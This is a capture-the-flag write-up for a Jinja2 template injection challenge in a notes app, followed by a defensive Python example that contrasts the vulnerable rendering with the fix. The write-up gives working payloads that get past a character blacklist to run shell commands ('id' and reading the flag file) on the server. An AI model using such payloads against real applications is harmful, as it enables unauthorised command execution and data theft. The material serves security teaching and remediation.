I am trying to make my own version of Notion named Lotion. Can you do a security check for my app? http://chall.nitdgplug.org:30014/
Writeup:
The app has a Jinja2 SSTI vulnerability, but with a blacklist: the characters ".", "[" and "]" cannot be used in a note. Searching Google turns up this payload, which avoids all three by reaching attributes through the attr filter and writing the underscores as \x5f escapes:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
And it works! Listing the current directory shows a directory named secret-note with a file named flag inside. Get the flag with this note:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat secret-note/flag')|attr('read')()}}
Flag: GLUG{INJECTED_PR3TTY_G00D_HUH}
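The root cause here is not the weak blacklist but the pattern behind it: the user's note is compiled as the template source, so every Jinja2 expression in it is evaluated. The following is an added example, not code from the writeup or the challenge, showing that pattern beside the fix. It assumes only that the jinja2 package is installed; the cfg object, its secret value and the probe note are constructed for the demo. The probe uses the same attr filter trick as the writeup's payload, but only reads a harmless attribute, which is enough to show that the blacklist passes it while the fixed rendering never interprets it.

```python
"""Added example (not from the writeup): why a character blacklist does not
fix Jinja2 SSTI, and what does. Assumes only that the jinja2 package is
installed; the cfg object and its secret value are constructed for the demo."""
from jinja2 import Environment

# The challenge's blacklist, as described in the writeup.
BLACKLIST = (".", "[", "]")


class FakeConfig:
    """Constructed stand-in for an object the template context exposes."""
    secret = "constructed-secret"


def blacklist_allows(note: str) -> bool:
    """Return True if the note contains none of the blacklisted characters."""
    return not any(ch in note for ch in BLACKLIST)


def render_vulnerable(note: str) -> str:
    """The challenge's pattern: the user's note IS the template source.
    Any Jinja2 expression in it is evaluated against the render context."""
    return Environment().from_string(note).render(cfg=FakeConfig())


def render_fixed(note: str) -> str:
    """The fix: the template is static and the note is passed as data.
    Expressions inside the note are never parsed, and autoescape handles HTML."""
    env = Environment(autoescape=True)
    return env.from_string("{{ note }}").render(note=note)


# "{{cfg.secret}}" would be rejected by the blacklist, but the attr filter
# reaches the same attribute without using '.', '[' or ']'.
PROBE = "{{cfg|attr('secret')}}"

if __name__ == "__main__":
    print("blacklist allows probe:", blacklist_allows(PROBE))   # True
    print("vulnerable render:", render_vulnerable(PROBE))       # constructed-secret
    print("fixed render:", render_fixed(PROBE))                 # the probe text itself, escaped
```

The fixed version renders the probe as literal text (with the quotes HTML-escaped), which is what a notes app should do with a note. Blacklisting characters in the note only raises the cost of writing a payload; keeping user input out of the template source removes the evaluation entirely.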